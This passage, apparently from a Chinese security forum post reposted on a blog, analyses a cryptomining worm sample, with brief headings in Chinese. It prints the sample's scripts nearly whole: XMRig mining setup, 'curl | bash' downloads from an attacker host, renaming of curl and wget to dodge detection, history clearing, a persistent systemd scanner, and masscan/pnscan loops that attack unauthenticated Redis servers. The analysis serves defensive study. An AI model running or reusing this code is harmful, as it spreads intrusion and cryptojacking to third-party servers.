         curl -L --progress-bar $miner_url_backup -o  /tmp/xmrig.tar.gz && tar -xf /tmp/xmrig.tar.gz -C $MOHOME/ && chmod +x $MOHOME/\[ext4\]
fi

rm /tmp/cf.tar


sed -i 's/"url": *"[^"]*",/"url": "xmr-asia1.nanopool.org:14444",/' $MOHOME/[ext4].pid
sed -i 's/"user": *"[^"]*",/"user": "'$WALLET'",/' $MOHOME/[ext4].pid
sed -i 's/"coin": *[^"]*,/"coin": "monero",/' $MOHOME/[ext4].pid
sed -i 's/"max-threads-hint": *[^,]*,/"max-threads-hint": 50,/' $MOHOME/[ext4].pid
sed -i 's#"log-file": *null,#"log-file": "'$MOHOME/[ext4].log'",#' $MOHOME/[ext4].pid
sed -i 's/"syslog": *[^,]*,/"syslog": true,/' $MOHOME/[ext4].pid

cp $MOHOME/[ext4].pid $MOHOME/config_background.json
sed -i 's/"background": *false,/"background": true,/' $MOHOME/config_background.json

静默下载cronis.sh并运行

echo ""
echo "[*] Setup complete"
curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/cronis.sh | bash || cd1 -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/cronis.sh | bash
history -c

样本分析——cronis.sh

命令替换绕检测

创建变量后期使用,修改命令绕过检测机制

rtdir="/etc/svcupdates"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cd1"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wd1"
mv /usr/bin/curl /usr/bin/url
mv /usr/bin/url /usr/bin/cd1
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/get /usr/bin/wd1
sleep $( seq 3 7 | sort -R | head -n1 )

安装扫描程序

安装pnscan,masscan扫描器,并下载后续脚本cronscan

sleep 1
echo "DER Uninstalled"
if ! [ -x "$(command -v masscan)" ]; then
rm -rf /var/lib/apt/lists/*
rm -rf x1.tar.gz
sleep 1
$bbdira -sL -o x1.tar.gz http://oracle.zzhreceive.top/b2f628fff19fda999999999/1.0.4.tar.gz
sleep 1
[ -f x1.tar.gz ] && tar zxf x1.tar.gz && cd masscan-1.0.4 && make && make install && cd .. && rm -rf masscan-1.0.4
echo "Masscan Installed"
fi
echo "Masscan Already Installed"
sleep 3 && rm -rf .watch
if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then
$bbdira -sL -o .x112 http://oracle.zzhreceive.top/b2f628/p.tar || $ccdira -q -O .x112 http://oracle.zzhreceive.top/b2f628/p.tar 
sleep 1
[ -f .x112 ] && tar xf .x112&& cd pnscan && ./configure && make && make install && cd .. && rm -rf pnscan .x112
echo "Pnscan Installed"
fi
echo "Pnscan Already Installed"

$bbdir -fsSL http://oracle.zzhreceive.top/b2f628/cronscan | bash
$bbdira -fsSL http://oracle.zzhreceive.top/b2f628/cronscan | bash

样本分析——cronscan

下载cronrs.sh,创建扫描服务,启动pnscan和masscan扫描器

if ! type systemctl >/dev/null; then

    $aabb -fsSL http://oracle.zzhreceive.top/b2f628/cronrs.sh | bash

  else

    echo "[*] Creating scan systemd service"
$aabb -fsSL http://oracle.zzhreceive.top/b2f628/cronrs.sh -o /var/tmp/.system/\[scan\] && chmod 744 /var/tmp/.system/\[scan\]
    cat >/tmp/scan.service <<EOL
[Service]
ExecStart=/var/tmp/.system/[scan]
Restart=always

[Install]
WantedBy=default.target
EOL
    sudo mv /tmp/scan.service /etc/systemd/system/scan.service
    echo "[*] Starting scan systemd service"
    sudo killall [scan] 2>/dev/null
    sudo systemctl daemon-reload
    sudo systemctl enable scan.service
    sudo systemctl start scan.service
fi

样本分析——cronrs.sh

运行扫描器查找192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16ip段的redis未授权漏洞扩大攻击范围。

pnx=pnscan
    [ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan
    [ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan
    for z in $( seq 0 5000 | sort -R ); do
    for x in $( echo -e "47\n39\n8\n121\n106\n120\n123\n65\n3\n101\n139\n99\n63\n81\n44\n18\n119\n100\n42\n49\n118\n54\n1\n50\n114\n182\n52\n13\n34\n112\n115\n111\n116\n16\n35\n117\n124\n59\n36\n103\n82\n175\n122\n129\n45\n152\n159\n113\n15\n61\n180\n172\n157\n60\n218\n176\n58\n204\n140\n184\n150\n193\n223\n192\n75\n46\n188\n183\n222\n14\n104\n27\n221\n211\n132\n107\n43\n212\n148\n110\n62\n202\n95\n220\n154\n23\n149\n125\n210\n203\n185\n171\n146\n109\n94\n219\n134" | sort -R ); do
    for y in $( seq 0 255 | sort -R ); do
    $pnx -t256 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/16 6379 > .r.$x.$y.o
    awk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.l
    while read -r h p; do
    cat .dat | redis-cli -h $h -p $p --raw &
    done < .r.$x.$y.l
    done
    done
        done
    sleep 1
    masscan --max-rate 10000 -p6379 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .shard
    sleep 1
    while read -r h p; do
    cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
    done < .shard
    sleep 1
    masscan --max-rate 10000 -p6379 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .ranges
    sleep 1
    while read -r h p; do
    cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
    done < .ranges
    sleep 1
    ip a | grep -oE '([0-9]{1,3}.?){4}/[0-9]{2}' 2>/dev/null | sed 's/\/\([0-9]\{2\}\)/\/16/g' > .inet
    sleep 1
    masscan --max-rate 10000 -p6379 -iL .inet | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .lan
    sleep 1
    while read -r h p; do
    cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
    done < .lan
    sleep 60
    rm -rf .dat .shard .ranges .lan 2>/dev/null

萌新第一次写样本分析,如果有写的不好或者分析失误的地方望表哥们轻喷。

Refer

https://paper.seebug.org/1477/

https://www.hackingarticles.in/docker-for-pentester-abusing-docker-api/

https://blog.csdn.net/mdzz14/article/details/111656726

https://blog.csdn.net/u013642886/article/details/115934635

https://cloud.tencent.com/developer/article/1828407

https://github.com/m0nad/Diamorphine

BY:先知论坛

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月31日15:11:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次寻找docker未授权新的利用方式结果变成样本分析这件事 - FA1C0Nhttp://cn-sec.com/archives/710672.html

发表评论

匿名网友 填写信息